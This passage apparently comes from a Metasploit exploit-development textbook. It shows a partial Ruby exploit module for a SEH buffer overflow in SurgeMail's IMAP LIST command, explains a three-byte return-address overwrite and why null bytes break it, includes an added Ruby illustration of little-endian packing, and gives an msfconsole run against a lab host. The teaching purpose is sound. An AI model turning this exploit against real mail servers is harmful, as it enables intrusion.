
Creating Your Own Exploits

207

            'Platform'       => 'win',
            'Targets'        =>
                [
                    [ 'Windows Universal', { 'Ret' => "\x7e\x51\x78" } ], # p/p/r in surgemail.exe
                ],
            'DisclosureDate' => 'March 13 2008',
            'DefaultTarget' => 0))
    end

    def exploit
        connected = connect_login
        lead = "\x41" * 10360
        evil = lead + [target.ret].pack("A3")
        print_status("Sending payload")
        sploit = '0002 LIST () "/' + evil + '" "PWNED"' + "\r\n"

To perform a three-byte overwrite of the SEH, we set the three bytes to be 
added to the buffer in the 'Targets' block, in little-endian order, as shown 
in boldface type in the listing. (Endianness is determined by the target CPU's 
architecture, and Intel-compatible processors use little-endian byte ordering.)

Next we replace the three Cs in the evil string with [target.ret].pack("A3"), 
which sends the return address exactly as it is declared in the 'Targets' 
block. When modifying many exploits that use a three-byte overwrite, you can 
declare the target address literally (0x0078517e in this case) and Metasploit 
will automatically order the bytes correctly when you use [target.ret].pack('V'). 
This scenario requires more granular control, because if we were to send the 
null (00) byte (the high byte of 0x0078517e), it would represent the end of a 
string and could prevent the exploit from functioning properly.
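As an added example (not from the book's listing), the following Ruby shows how the literal address 0x0078517e relates to the three 'Ret' bytes above, why pack('V') would introduce a null byte, and what a null does to a string that is copied as a C string; the helper names are my own.

```ruby
# Added example, not part of the book's exploit module.
#
# Array#pack with 'V' emits a 32-bit unsigned value in little-endian
# order (low byte first), which is how an Intel CPU reads an address
# off the stack.
def pack_little_endian(addr)
  [addr].pack('V')
end

# 0x0078517e has 0x00 as its most significant byte, so its full
# 4-byte little-endian form ends in a null.
def contains_null?(bytes)
  bytes.include?("\x00")
end

# Model what a C-string copy does to a buffer: everything after the
# first null byte is lost, so anything that should follow the address
# never arrives.
def as_c_string(bytes)
  bytes.split("\x00", 2).first || ''
end

# The three low bytes used for a partial overwrite. Only valid when the
# top byte is zero: the byte left untouched in memory must already be
# the value we want.
def partial_overwrite_bytes(addr)
  raise ArgumentError, 'top byte must be 0x00 for a 3-byte overwrite' unless (addr >> 24).zero?
  pack_little_endian(addr)[0, 3]
end

# Mirror of the listing: [target.ret].pack("A3") passes a 3-byte string
# through unchanged (padding or truncating to exactly 3 bytes).
def pack_as_declared(ret_bytes)
  [ret_bytes].pack('A3')
end

if __FILE__ == $PROGRAM_NAME
  addr = 0x0078517e
  full = pack_little_endian(addr)
  puts "pack('V'):    #{full.unpack1('H*')} (contains null: #{contains_null?(full)})"
  puts "3-byte form:  #{partial_overwrite_bytes(addr).unpack1('H*')}"
  puts "after C copy: #{as_c_string(full + 'PWNED').unpack1('H*')}"
end
```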

Now is a good time to run the exploit to make sure that it works properly. 
If you jump too far ahead when developing an exploit, you run the risk 
of making an error somewhere and having to do a lot of backtracking to find 
out what went wrong. Here's the exploit:

msf > use exploit/windows/imap/surgemail_book
msf exploit(surgemail_book) > set IMAPPASS test
IMAPPASS => test
msf exploit(surgemail_book) > set IMAPUSER test
IMAPUSER => test
msf exploit(surgemail_book) > set RHOST 192.168.1.155
RHOST => 192.168.1.155
msf exploit(surgemail_book) > set PAYLOAD generic/debug_trap
PAYLOAD => generic/debug_trap
msf exploit(surgemail_book) > exploit

[*] Authenticating as test with password test...
[*] Sending payload
[*] Exploit completed, but no session was created.
msf exploit(surgemail_book) >